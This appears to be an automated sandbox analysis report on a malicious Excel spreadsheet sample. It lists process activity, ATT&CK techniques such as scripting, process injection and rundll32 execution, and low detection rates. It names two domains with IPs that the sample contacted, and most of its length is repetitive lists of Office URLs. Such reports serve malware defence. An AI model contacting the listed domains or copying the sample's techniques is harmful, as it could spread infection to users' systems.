Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: rundll32.exe, 00000001.00000002.261250009.0000000004DC0000.00000002.00000001.sdmp, rundll32.exe, 00000003.00000002.254445303.0000000000B70000.00000002.00000001.sdmpBinary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
Source: rundll32.exe, 00000001.00000002.261250009.0000000004DC0000.00000002.00000001.sdmp, rundll32.exe, 00000003.00000002.254445303.0000000000B70000.00000002.00000001.sdmpBinary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
Source: rundll32.exe, 00000001.00000002.261250009.0000000004DC0000.00000002.00000001.sdmp, rundll32.exe, 00000003.00000002.254445303.0000000000B70000.00000002.00000001.sdmpBinary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
Source: rundll32.exe, 00000001.00000002.261250009.0000000004DC0000.00000002.00000001.sdmp, rundll32.exe, 00000003.00000002.254445303.0000000000B70000.00000002.00000001.sdmpBinary or memory string: An unknown internal message was received by the Hyper-V Compute Service.

Mitre Att&ck Matrix

Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
Valid AccountsScripting21Path InterceptionProcess Injection1Masquerading1OS Credential DumpingSecurity Software Discovery1Remote ServicesData from Local SystemExfiltration Over Other Network MediumEncrypted Channel2Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
Default AccountsExploitation for Client Execution23Boot or Logon Initialization ScriptsBoot or Logon Initialization ScriptsDisable or Modify Tools1LSASS MemoryFile and Directory Discovery1Remote Desktop ProtocolData from Removable MediaExfiltration Over BluetoothNon-Application Layer Protocol1Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)Rundll321Security Account ManagerSystem Information Discovery2SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationApplication Layer Protocol2Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Process Injection1NTDSSystem Network Configuration DiscoveryDistributed Component Object ModelInput CaptureScheduled TransferProtocol ImpersonationSIM Card SwapCarrier Billing Fraud
Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptScripting21LSA SecretsRemote System DiscoverySSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings

Behavior Graph

Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

windows-stand

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

SourceDetectionScannerLabelLink
0b31c0f0_by_Libranalysis.xls5%VirustotalBrowse
0b31c0f0_by_Libranalysis.xls11%ReversingLabs

Dropped Files

No Antivirus matches

Unpacked PE Files

No Antivirus matches

Domains

SourceDetectionScannerLabelLink
signifysystem.com3%VirustotalBrowse
fcventasyservicios.cl0%VirustotalBrowse

URLs

SourceDetectionScannerLabelLink
https://cdn.entity.0%URL Reputationsafe
https://cdn.entity.0%URL Reputationsafe
https://cdn.entity.0%URL Reputationsafe
https://cdn.entity.0%URL Reputationsafe
https://powerlift.acompli.net0%URL Reputationsafe
https://powerlift.acompli.net0%URL Reputationsafe
https://powerlift.acompli.net0%URL Reputationsafe
https://powerlift.acompli.net0%URL Reputationsafe
https://rpsticket.partnerservices.getmicrosoftkey.com0%URL Reputationsafe
https://rpsticket.partnerservices.getmicrosoftkey.com0%URL Reputationsafe
https://rpsticket.partnerservices.getmicrosoftkey.com0%URL Reputationsafe
https://rpsticket.partnerservices.getmicrosoftkey.com0%URL Reputationsafe
https://cortana.ai0%URL Reputationsafe
https://cortana.ai0%URL Reputationsafe
https://cortana.ai0%URL Reputationsafe
https://cortana.ai0%URL Reputationsafe
https://api.aadrm.com/0%URL Reputationsafe
https://api.aadrm.com/0%URL Reputationsafe
https://api.aadrm.com/0%URL Reputationsafe
https://api.aadrm.com/0%URL Reputationsafe
https://ofcrecsvcapi-int.azurewebsites.net/0%VirustotalBrowse
https://ofcrecsvcapi-int.azurewebsites.net/0%Avira URL Cloudsafe
https://res.getmicrosoftkey.com/api/redemptionevents0%URL Reputationsafe
https://res.getmicrosoftkey.com/api/redemptionevents0%URL Reputationsafe
https://res.getmicrosoftkey.com/api/redemptionevents0%URL Reputationsafe
https://res.getmicrosoftkey.com/api/redemptionevents0%URL Reputationsafe
https://powerlift-frontdesk.acompli.net0%URL Reputationsafe
https://powerlift-frontdesk.acompli.net0%URL Reputationsafe
https://powerlift-frontdesk.acompli.net0%URL Reputationsafe
https://powerlift-frontdesk.acompli.net0%URL Reputationsafe
https://officeci.azurewebsites.net/api/0%VirustotalBrowse
https://officeci.azurewebsites.net/api/0%Avira URL Cloudsafe
https://store.office.cn/addinstemplate0%URL Reputationsafe
https://store.office.cn/addinstemplate0%URL Reputationsafe
https://store.office.cn/addinstemplate0%URL Reputationsafe
https://store.office.cn/addinstemplate0%URL Reputationsafe
https://store.officeppe.com/addinstemplate0%URL Reputationsafe
https://store.officeppe.com/addinstemplate0%URL Reputationsafe
https://store.officeppe.com/addinstemplate0%URL Reputationsafe
https://store.officeppe.com/addinstemplate0%URL Reputationsafe
https://dev0-api.acompli.net/autodetect0%URL Reputationsafe
https://dev0-api.acompli.net/autodetect0%URL Reputationsafe
https://dev0-api.acompli.net/autodetect0%URL Reputationsafe
https://dev0-api.acompli.net/autodetect0%URL Reputationsafe
https://www.odwebp.svc.ms0%URL Reputationsafe
https://www.odwebp.svc.ms0%URL Reputationsafe
https://www.odwebp.svc.ms0%URL Reputationsafe
https://www.odwebp.svc.ms0%URL Reputationsafe
https://dataservice.o365filtering.com/0%URL Reputationsafe
https://dataservice.o365filtering.com/0%URL Reputationsafe
https://dataservice.o365filtering.com/0%URL Reputationsafe
https://dataservice.o365filtering.com/0%URL Reputationsafe
https://officesetup.getmicrosoftkey.com0%URL Reputationsafe
https://officesetup.getmicrosoftkey.com0%URL Reputationsafe
https://officesetup.getmicrosoftkey.com0%URL Reputationsafe
https://officesetup.getmicrosoftkey.com0%URL Reputationsafe
https://prod-global-autodetect.acompli.net/autodetect0%URL Reputationsafe
https://prod-global-autodetect.acompli.net/autodetect0%URL Reputationsafe
https://prod-global-autodetect.acompli.net/autodetect0%URL Reputationsafe
https://prod-global-autodetect.acompli.net/autodetect0%URL Reputationsafe
https://ncus.contentsync.0%URL Reputationsafe
https://ncus.contentsync.0%URL Reputationsafe
https://ncus.contentsync.0%URL Reputationsafe
https://ncus.contentsync.0%URL Reputationsafe
https://apis.live.net/v5.0/0%URL Reputationsafe
https://apis.live.net/v5.0/0%URL Reputationsafe
https://apis.live.net/v5.0/0%URL Reputationsafe
https://apis.live.net/v5.0/0%URL Reputationsafe
https://wus2.contentsync.0%URL Reputationsafe
https://wus2.contentsync.0%URL Reputationsafe
https://wus2.contentsync.0%URL Reputationsafe
https://wus2.contentsync.0%URL Reputationsafe
https://asgsmsproxyapi.azurewebsites.net/0%Avira URL Cloudsafe
https://dataservice.o365filtering.com/PolicySync/PolicySync.svc/SyncFile0%URL Reputationsafe
https://dataservice.o365filtering.com/PolicySync/PolicySync.svc/SyncFile0%URL Reputationsafe
https://dataservice.o365filtering.com/PolicySync/PolicySync.svc/SyncFile0%URL Reputationsafe
https://ncus.pagecontentsync.0%URL Reputationsafe
https://ncus.pagecontentsync.0%URL Reputationsafe
https://ncus.pagecontentsync.0%URL Reputationsafe
https://skyapi.live.net/Activity/0%URL Reputationsafe
https://skyapi.live.net/Activity/0%URL Reputationsafe
https://skyapi.live.net/Activity/0%URL Reputationsafe
https://dataservice.o365filtering.com0%URL Reputationsafe
https://dataservice.o365filtering.com0%URL Reputationsafe
https://dataservice.o365filtering.com0%URL Reputationsafe
https://api.cortana.ai0%URL Reputationsafe
https://api.cortana.ai0%URL Reputationsafe
https://api.cortana.ai0%URL Reputationsafe
https://ovisualuiapp.azurewebsites.net/pbiagave/0%Avira URL Cloudsafe
https://directory.services.0%URL Reputationsafe
https://directory.services.0%URL Reputationsafe
https://directory.services.0%URL Reputationsafe
https://staging.cortana.ai0%URL Reputationsafe
https://staging.cortana.ai0%URL Reputationsafe
https://staging.cortana.ai0%URL Reputationsafe

Domains and IPs

Contacted Domains

NameIPActiveMaliciousAntivirus DetectionReputation
signifysystem.com
192.185.39.58
truefalseunknown
fcventasyservicios.cl
192.185.32.232
truefalseunknown

URLs from Memory and Binaries

NameSourceMaliciousAntivirus DetectionReputation
https://api.diagnosticssdf.office.comF29B1D57-CE95-4888-B145-4A6EF177D137.0.drfalse
    high
    https://login.microsoftonline.com/F29B1D57-CE95-4888-B145-4A6EF177D137.0.drfalse
      high
      https://shell.suite.office.com:1443F29B1D57-CE95-4888-B145-4A6EF177D137.0.drfalse
        high
        https://login.windows.net/72f988bf-86f1-41af-91ab-2d7cd011db47/oauth2/authorizeF29B1D57-CE95-4888-B145-4A6EF177D137.0.drfalse
          high
          https://autodiscover-s.outlook.com/F29B1D57-CE95-4888-B145-4A6EF177D137.0.drfalse
            high
            https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=FlickrF29B1D57-CE95-4888-B145-4A6EF177D137.0.drfalse
              high
              https://cdn.entity.F29B1D57-CE95-4888-B145-4A6EF177D137.0.drfalse
              • URL Reputation: safe
              • URL Reputation: safe
              • URL Reputation: safe
              • URL Reputation: safe
              unknown
              https://api.addins.omex.office.net/appinfo/queryF29B1D57-CE95-4888-B145-4A6EF177D137.0.drfalse
                high
                https://clients.config.office.net/user/v1.0/tenantassociationkeyF29B1D57-CE95-4888-B145-4A6EF177D137.0.drfalse
                  high
                  https://dev.virtualearth.net/REST/V1/GeospatialEndpoint/F29B1D57-CE95-4888-B145-4A6EF177D137.0.drfalse
                    high
                    https://powerlift.acompli.netF29B1D57-CE95-4888-B145-4A6EF177D137.0.drfalse
                    • URL Reputation: safe
                    • URL Reputation: safe
                    • URL Reputation: safe
                    • URL Reputation: safe
                    unknown
                    https://rpsticket.partnerservices.getmicrosoftkey.comF29B1D57-CE95-4888-B145-4A6EF177D137.0.drfalse
                    • URL Reputation: safe
                    • URL Reputation: safe
                    • URL Reputation: safe
                    • URL Reputation: safe
                    unknown
                    https://lookup.onenote.com/lookup/geolocation/v1F29B1D57-CE95-4888-B145-4A6EF177D137.0.drfalse
                      high
                      https://cortana.aiF29B1D57-CE95-4888-B145-4A6EF177D137.0.drfalse
                      • URL Reputation: safe
                      • URL Reputation: safe
                      • URL Reputation: safe
                      • URL Reputation: safe
                      unknown
                      https://apc.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeechF29B1D57-CE95-4888-B145-4A6EF177D137.0.drfalse
                        high
                        https://cloudfiles.onenote.com/upload.aspxF29B1D57-CE95-4888-B145-4A6EF177D137.0.drfalse
                          high
                          https://syncservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFileF29B1D57-CE95-4888-B145-4A6EF177D137.0.drfalse
                            high
                            https://entitlement.diagnosticssdf.office.comF29B1D57-CE95-4888-B145-4A6EF177D137.0.drfalse
                              high
                              https://na01.oscs.protection.outlook.com/api/SafeLinksApi/GetPolicyF29B1D57-CE95-4888-B145-4A6EF177D137.0.drfalse
                                high
                                https://api.aadrm.com/F29B1D57-CE95-4888-B145-4A6EF177D137.0.drfalse
                                • URL Reputation: safe
                                • URL Reputation: safe
                                • URL Reputation: safe
                                • URL Reputation: safe
                                unknown
                                https://ofcrecsvcapi-int.azurewebsites.net/F29B1D57-CE95-4888-B145-4A6EF177D137.0.drfalse
                                • 0%, Virustotal, Browse
                                • Avira URL Cloud: safe
                                unknown
                                https://dataservice.protection.outlook.com/PsorWebService/v1/ClientSyncFile/MipPoliciesF29B1D57-CE95-4888-B145-4A6EF177D137.0.drfalse
                                  high
                                  https://api.microsoftstream.com/api/F29B1D57-CE95-4888-B145-4A6EF177D137.0.drfalse
                                    high
                                    https://insertmedia.bing.office.net/images/hosted?host=office&adlt=strict&hostType=ImmersiveF29B1D57-CE95-4888-B145-4A6EF177D137.0.drfalse
                                      high
                                      https://cr.office.comF29B1D57-CE95-4888-B145-4A6EF177D137.0.drfalse
                                        high
                                        https://portal.office.com/account/?ref=ClientMeControlF29B1D57-CE95-4888-B145-4A6EF177D137.0.drfalse
                                          high
                                          https://ecs.office.com/config/v2/OfficeF29B1D57-CE95-4888-B145-4A6EF177D137.0.drfalse
                                            high
                                            https://graph.ppe.windows.netF29B1D57-CE95-4888-B145-4A6EF177D137.0.drfalse
                                              high
                                              https://res.getmicrosoftkey.com/api/redemptioneventsF29B1D57-CE95-4888-B145-4A6EF177D137.0.drfalse
                                              • URL Reputation: safe
                                              • URL Reputation: safe
                                              • URL Reputation: safe
                                              • URL Reputation: safe
                                              unknown
                                              https://powerlift-frontdesk.acompli.netF29B1D57-CE95-4888-B145-4A6EF177D137.0.drfalse
                                              • URL Reputation: safe
                                              • URL Reputation: safe
                                              • URL Reputation: safe
                                              • URL Reputation: safe
                                              unknown
                                              https://tasks.office.comF29B1D57-CE95-4888-B145-4A6EF177D137.0.drfalse
                                                high
                                                https://officeci.azurewebsites.net/api/F29B1D57-CE95-4888-B145-4A6EF177D137.0.drfalse
                                                • 0%, Virustotal, Browse
                                                • Avira URL Cloud: safe
                                                unknown
                                                https://sr.outlook.office.net/ws/speech/recognize/assistant/workF29B1D57-CE95-4888-B145-4A6EF177D137.0.drfalse
                                                  high
                                                  https://store.office.cn/addinstemplateF29B1D57-CE95-4888-B145-4A6EF177D137.0.drfalse
                                                  • URL Reputation: safe
                                                  • URL Reputation: safe
                                                  • URL Reputation: safe
                                                  • URL Reputation: safe
                                                  unknown
                                                  https://outlook.office.com/autosuggest/api/v1/init?cvid=F29B1D57-CE95-4888-B145-4A6EF177D137.0.drfalse
                                                    high
                                                    https://globaldisco.crm.dynamics.comF29B1D57-CE95-4888-B145-4A6EF177D137.0.drfalse
                                                      high
                                                      https://nam.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeechF29B1D57-CE95-4888-B145-4A6EF177D137.0.drfalse
                                                        high
                                                        https://store.officeppe.com/addinstemplateF29B1D57-CE95-4888-B145-4A6EF177D137.0.drfalse
                                                        • URL Reputation: safe
                                                        • URL Reputation: safe
                                                        • URL Reputation: safe
                                                        • URL Reputation: safe
                                                        unknown
                                                        https://dev0-api.acompli.net/autodetectF29B1D57-CE95-4888-B145-4A6EF177D137.0.drfalse
                                                        • URL Reputation: safe
                                                        • URL Reputation: safe
                                                        • URL Reputation: safe
                                                        • URL Reputation: safe
                                                        unknown
                                                        https://www.odwebp.svc.msF29B1D57-CE95-4888-B145-4A6EF177D137.0.drfalse
                                                        • URL Reputation: safe
                                                        • URL Reputation: safe
                                                        • URL Reputation: safe
                                                        • URL Reputation: safe
                                                        unknown
                                                        https://api.powerbi.com/v1.0/myorg/groupsF29B1D57-CE95-4888-B145-4A6EF177D137.0.drfalse
                                                          high
                                                          https://web.microsoftstream.com/video/F29B1D57-CE95-4888-B145-4A6EF177D137.0.drfalse
                                                            high
                                                            https://graph.windows.netF29B1D57-CE95-4888-B145-4A6EF177D137.0.drfalse
                                                              high
                                                              https://dataservice.o365filtering.com/F29B1D57-CE95-4888-B145-4A6EF177D137.0.drfalse
                                                              • URL Reputation: safe
                                                              • URL Reputation: safe
                                                              • URL Reputation: safe
                                                              • URL Reputation: safe
                                                              unknown
                                                              https://officesetup.getmicrosoftkey.comF29B1D57-CE95-4888-B145-4A6EF177D137.0.drfalse
                                                              • URL Reputation: safe
                                                              • URL Reputation: safe
                                                              • URL Reputation: safe
                                                              • URL Reputation: safe
                                                              unknown
                                                              https://analysis.windows.net/powerbi/apiF29B1D57-CE95-4888-B145-4A6EF177D137.0.drfalse
                                                                high
                                                                https://prod-global-autodetect.acompli.net/autodetectF29B1D57-CE95-4888-B145-4A6EF177D137.0.drfalse
                                                                • URL Reputation: safe
                                                                • URL Reputation: safe
                                                                • URL Reputation: safe
                                                                • URL Reputation: safe
                                                                unknown
                                                                https://outlook.office365.com/autodiscover/autodiscover.jsonF29B1D57-CE95-4888-B145-4A6EF177D137.0.drfalse
                                                                  high
                                                                  https://powerpoint.uservoice.com/forums/288952-powerpoint-for-ipad-iphone-iosF29B1D57-CE95-4888-B145-4A6EF177D137.0.drfalse
                                                                    high
                                                                    https://eur.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeechF29B1D57-CE95-4888-B145-4A6EF177D137.0.drfalse
                                                                      high
                                                                      https://pf.directory.live.com/profile/mine/System.ShortCircuitProfile.jsonF29B1D57-CE95-4888-B145-4A6EF177D137.0.drfalse
                                                                        high
                                                                        https://ncus.contentsync.F29B1D57-CE95-4888-B145-4A6EF177D137.0.drfalse
                                                                        • URL Reputation: safe
                                                                        • URL Reputation: safe
                                                                        • URL Reputation: safe
                                                                        • URL Reputation: safe
                                                                        unknown
                                                                        https://onedrive.live.com/about/download/?windows10SyncClientInstalled=falseF29B1D57-CE95-4888-B145-4A6EF177D137.0.drfalse
                                                                          high
                                                                          https://webdir.online.lync.com/autodiscover/autodiscoverservice.svc/root/F29B1D57-CE95-4888-B145-4A6EF177D137.0.drfalse
                                                                            high
                                                                            http://weather.service.msn.com/data.aspxF29B1D57-CE95-4888-B145-4A6EF177D137.0.drfalse
                                                                              high
                                                                              https://apis.live.net/v5.0/F29B1D57-CE95-4888-B145-4A6EF177D137.0.drfalse
                                                                              • URL Reputation: safe
                                                                              • URL Reputation: safe
                                                                              • URL Reputation: safe
                                                                              • URL Reputation: safe
                                                                              unknown
                                                                              https://officemobile.uservoice.com/forums/929800-office-app-ios-and-ipad-asksF29B1D57-CE95-4888-B145-4A6EF177D137.0.drfalse
                                                                                high
                                                                                https://word.uservoice.com/forums/304948-word-for-ipad-iphone-iosF29B1D57-CE95-4888-B145-4A6EF177D137.0.drfalse
                                                                                  high
                                                                                  https://autodiscover-s.outlook.com/autodiscover/autodiscover.xmlF29B1D57-CE95-4888-B145-4A6EF177D137.0.drfalse
                                                                                    high
                                                                                    https://management.azure.comF29B1D57-CE95-4888-B145-4A6EF177D137.0.drfalse
                                                                                      high
                                                                                      https://wus2.contentsync.F29B1D57-CE95-4888-B145-4A6EF177D137.0.drfalse
                                                                                      • URL Reputation: safe
                                                                                      • URL Reputation: safe
                                                                                      • URL Reputation: safe
                                                                                      • URL Reputation: safe
                                                                                      unknown
                                                                                      https://incidents.diagnostics.office.comF29B1D57-CE95-4888-B145-4A6EF177D137.0.drfalse
                                                                                        high
                                                                                        https://clients.config.office.net/user/v1.0/iosF29B1D57-CE95-4888-B145-4A6EF177D137.0.drfalse
                                                                                          high
                                                                                          https://insertmedia.bing.office.net/odc/insertmediaF29B1D57-CE95-4888-B145-4A6EF177D137.0.drfalse
                                                                                            high
                                                                                            https://o365auditrealtimeingestion.manage.office.comF29B1D57-CE95-4888-B145-4A6EF177D137.0.drfalse
                                                                                              high
                                                                                              https://outlook.office365.com/api/v1.0/me/ActivitiesF29B1D57-CE95-4888-B145-4A6EF177D137.0.drfalse
                                                                                                high
                                                                                                https://api.office.netF29B1D57-CE95-4888-B145-4A6EF177D137.0.drfalse
                                                                                                  high
                                                                                                  https://incidents.diagnosticssdf.office.comF29B1D57-CE95-4888-B145-4A6EF177D137.0.drfalse
                                                                                                    high
                                                                                                    https://asgsmsproxyapi.azurewebsites.net/F29B1D57-CE95-4888-B145-4A6EF177D137.0.drfalse
                                                                                                    • Avira URL Cloud: safe
                                                                                                    unknown
                                                                                                    https://clients.config.office.net/user/v1.0/android/policiesF29B1D57-CE95-4888-B145-4A6EF177D137.0.drfalse
                                                                                                      high
                                                                                                      https://entitlement.diagnostics.office.comF29B1D57-CE95-4888-B145-4A6EF177D137.0.drfalse
                                                                                                        high
                                                                                                        https://pf.directory.live.com/profile/mine/WLX.Profiles.IC.jsonF29B1D57-CE95-4888-B145-4A6EF177D137.0.drfalse
                                                                                                          high
                                                                                                          https://outlook.office.com/F29B1D57-CE95-4888-B145-4A6EF177D137.0.drfalse
                                                                                                            high
                                                                                                            https://storage.live.com/clientlogs/uploadlocationF29B1D57-CE95-4888-B145-4A6EF177D137.0.drfalse
                                                                                                              high
                                                                                                              https://templatelogging.office.com/client/logF29B1D57-CE95-4888-B145-4A6EF177D137.0.drfalse
                                                                                                                high
                                                                                                                https://outlook.office365.com/F29B1D57-CE95-4888-B145-4A6EF177D137.0.drfalse
                                                                                                                  high
                                                                                                                  https://webshell.suite.office.comF29B1D57-CE95-4888-B145-4A6EF177D137.0.drfalse
                                                                                                                    high
                                                                                                                    https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=OneDriveF29B1D57-CE95-4888-B145-4A6EF177D137.0.drfalse
                                                                                                                      high
                                                                                                                      https://management.azure.com/F29B1D57-CE95-4888-B145-4A6EF177D137.0.drfalse
                                                                                                                        high
                                                                                                                        https://login.windows.net/common/oauth2/authorizeF29B1D57-CE95-4888-B145-4A6EF177D137.0.drfalse
                                                                                                                          high
                                                                                                                          https://dataservice.o365filtering.com/PolicySync/PolicySync.svc/SyncFileF29B1D57-CE95-4888-B145-4A6EF177D137.0.drfalse
                                                                                                                          • URL Reputation: safe
                                                                                                                          • URL Reputation: safe
                                                                                                                          • URL Reputation: safe
                                                                                                                          unknown
                                                                                                                          https://graph.windows.net/F29B1D57-CE95-4888-B145-4A6EF177D137.0.drfalse
                                                                                                                            high
                                                                                                                            https://api.powerbi.com/beta/myorg/importsF29B1D57-CE95-4888-B145-4A6EF177D137.0.drfalse
                                                                                                                              high
                                                                                                                              https://devnull.onenote.comF29B1D57-CE95-4888-B145-4A6EF177D137.0.drfalse
                                                                                                                                high
                                                                                                                                https://ncus.pagecontentsync.F29B1D57-CE95-4888-B145-4A6EF177D137.0.drfalse
                                                                                                                                • URL Reputation: safe
                                                                                                                                • URL Reputation: safe
                                                                                                                                • URL Reputation: safe
                                                                                                                                unknown
                                                                                                                                https://r4.res.office365.com/footprintconfig/v1.7/scripts/fpconfig.jsonF29B1D57-CE95-4888-B145-4A6EF177D137.0.drfalse
                                                                                                                                  high
                                                                                                                                  https://messaging.office.com/F29B1D57-CE95-4888-B145-4A6EF177D137.0.drfalse
                                                                                                                                    high
